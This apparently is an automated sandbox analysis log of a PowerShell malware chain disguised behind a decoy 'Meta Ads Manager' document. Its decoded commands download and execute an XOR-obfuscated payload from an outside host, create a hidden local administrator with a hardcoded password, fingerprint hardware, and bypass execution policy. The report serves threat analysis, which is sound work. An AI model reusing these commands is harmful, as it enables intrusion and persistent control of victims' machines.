Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\myRdpService.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\myRdpService.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Start-Process powershell -WindowStyle hidden -ArgumentList "-WindowStyle Hidden", "-NoLogo", "-NoProfile", "-ExecutionPolicy Bypass", "-EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded IEX ([TEXt.EncODinG]::UTF8.GeTStRINg((Iwr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly9jb2NvbWV0aG9kZS5kZS9PS05m")))).COnTEnt))
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $uri = "https://cocomethode.de/file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df77ed6fc10cd2b8f1bf6e1419afd1b8e652d60820a56f5d872b9832d58cfe65348bdb616db23e43f7972daf391f13bd6a69c891902807aad423627811c8e0d4aa7ee939d745201eed806ee979fa";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg \| ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages \| ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive \| Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test \| Out-File -FilePath "deviceId.txt" -Encoding UTF8
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens \| ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } \| Out-File -FilePath "C:\Windows\Temp\dp"
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded get-service "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Start-Process powershell -WindowStyle hidden -ArgumentList "-WindowStyle Hidden", "-NoLogo", "-NoProfile", "-ExecutionPolicy Bypass", "-EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded IEX ([TEXt.EncODinG]::UTF8.GeTStRINg((Iwr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly9jb2NvbWV0aG9kZS5kZS9PS05m")))).COnTEnt))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $uri = "https://cocomethode.de/file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df77ed6fc10cd2b8f1bf6e1419afd1b8e652d60820a56f5d872b9832d58cfe65348bdb616db23e43f7972daf391f13bd6a69c891902807aad423627811c8e0d4aa7ee939d745201eed806ee979fa";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg \| ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages \| ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive \| Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test \| Out-File -FilePath "deviceId.txt" -Encoding UTF8
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded get-service "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens \| ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } \| Out-File -FilePath "C:\Windows\Temp\dp"

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpAC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD097.tmp" "c:\Users\user\AppData\Local\Temp\40v0i4f3\CSCD6446BB959A24110B54C9D2694B6A8A7.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\JD-Meta-Ads-Manager.pdf.docx" /o ""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgAC
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2